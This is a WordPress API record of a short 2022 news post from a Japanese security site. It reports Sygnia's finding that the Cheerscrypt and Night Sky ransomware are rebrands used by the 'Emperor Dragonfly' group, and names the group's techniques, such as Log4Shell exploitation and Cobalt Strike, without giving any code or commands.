{"id":7564,"date":"2022-10-04T17:02:26","date_gmt":"2022-10-04T08:02:26","guid":{"rendered":"https:\/\/cyberenso.jp\/?p=7564"},"modified":"2022-11-21T17:06:42","modified_gmt":"2022-11-21T08:06:42","slug":"cheerscrypt-ransomware-has-been-linked-to-the-chinese-hacking-group-emperor-dragonfly","status":"publish","type":"post","link":"https:\/\/cyberenso.jp\/en\/cheerscrypt-ransomware-has-been-linked-to-the-chinese-hacking-group-emperor-dragonfly\/","title":{"rendered":"Cheerscrypt ransomware has been linked to the Chinese hacking group, Emperor Dragonfly"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-post\" data-elementor-id=\"7564\" class=\"elementor elementor-7564\" data-elementor-post-type=\"post\">\n\t\t\t\t\t\t\t\t\t<section class=\"elementor-section elementor-top-section elementor-element elementor-element-96ed1a3 elementor-section-boxed elementor-section-height-default elementor-section-height-default\" data-id=\"96ed1a3\" data-element_type=\"section\">\n\t\t\t\t\t\t<div class=\"elementor-container elementor-column-gap-default\">\n\t\t\t\t\t<div class=\"elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-ff0a2a6\" data-id=\"ff0a2a6\" data-element_type=\"column\">\n\t\t\t<div class=\"elementor-widget-wrap elementor-element-populated\">\n\t\t\t\t\t\t\t\t<div class=\"elementor-element elementor-element-7c6a304 elementor-widget elementor-widget-text-editor\" data-id=\"7c6a304\" data-element_type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t<div class=\"elementor-widget-container\">\n\t\t\t\t\t\t\t<p>On Monday 3rd of October 2022, the cyber security company, Sygnia released an article that stated that they had investigated a Cheerscrypt ransomware attack which utilized Night Sky ransomware TTPs and then on further analysis, it was revealed that Cheerscrypt and Night Sky are both rebrands of the same threat group, dubbed \u2018Emperor Dragonfly\u2019.<\/p><p>The TTPs that were identified were the exploitation of the Apache \u2018Log4Shell\u2019 Log4j vulnerability (CVE-2021-44228) to execute PowerShell commands, which initiates a DLL-sideloading technique characteristic as well as the threat actors dropping a Cobalt Strike beacon connected to a C2 address previously associated with Night Sky operations.<\/p><p>In June 2022, both Secureworks and Microsoft reported that the \u2018Emperor Dragonfly\u2019 group had been observed using multiple ransomware families like Night Sky, Rook, Pandora, and AtomSilo to conduct government-sponsored cyberespionage under the disguise of being financially-motivated attacks. Therefore, Cheerscrypt is believed to be another one of Emperor Dragonfly&#8217;s continual payload rebranding efforts, attempting to evade attribution.<\/p>\t\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t<\/div>\n\t\t\t\t\t\t\t<\/div>\n\t\t<\/section>\n\t\t\t\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>On Monday 3rd of October 2022, the cyber security company, Sygnia released an article that stated that they had investigated a Cheerscrypt ransomware attack which utilized Night Sky ransomware TTPs and then on further analysis, it was revealed that Cheerscrypt and Night Sky are both rebrands of the same threat group, dubbed \u2018Emperor Dragonfly\u2019. The TTPs that were identified were<span class=\"excerpt-hellip\"> [\u2026]<\/span><\/p>\n","protected":false},"author":1,"featured_media":7569,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6,10,12,2,1],"tags":[],"class_list":["post-7564","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-latest_news","category-latest_vulnerabilities","category-read_article","category-ce_news","category-uncategorized"],"acf":[],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/cyberenso.jp\/wp-content\/uploads\/2022\/11\/Picture1-7.jpg?fit=1377%2C918&ssl=1","_links":{"self":[{"href":"https:\/\/cyberenso.jp\/en\/wp-json\/wp\/v2\/posts\/7564"}],"collection":[{"href":"https:\/\/cyberenso.jp\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/cyberenso.jp\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/cyberenso.jp\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cyberenso.jp\/en\/wp-json\/wp\/v2\/comments?post=7564"}],"version-history":[{"count":6,"href":"https:\/\/cyberenso.jp\/en\/wp-json\/wp\/v2\/posts\/7564\/revisions"}],"predecessor-version":[{"id":7572,"href":"https:\/\/cyberenso.jp\/en\/wp-json\/wp\/v2\/posts\/7564\/revisions\/7572"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/cyberenso.jp\/en\/wp-json\/wp\/v2\/media\/7569"}],"wp:attachment":[{"href":"https:\/\/cyberenso.jp\/en\/wp-json\/wp\/v2\/media?parent=7564"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/cyberenso.jp\/en\/wp-json\/wp\/v2\/categories?post=7564"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/cyberenso.jp\/en\/wp-json\/wp\/v2\/tags?post=7564"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}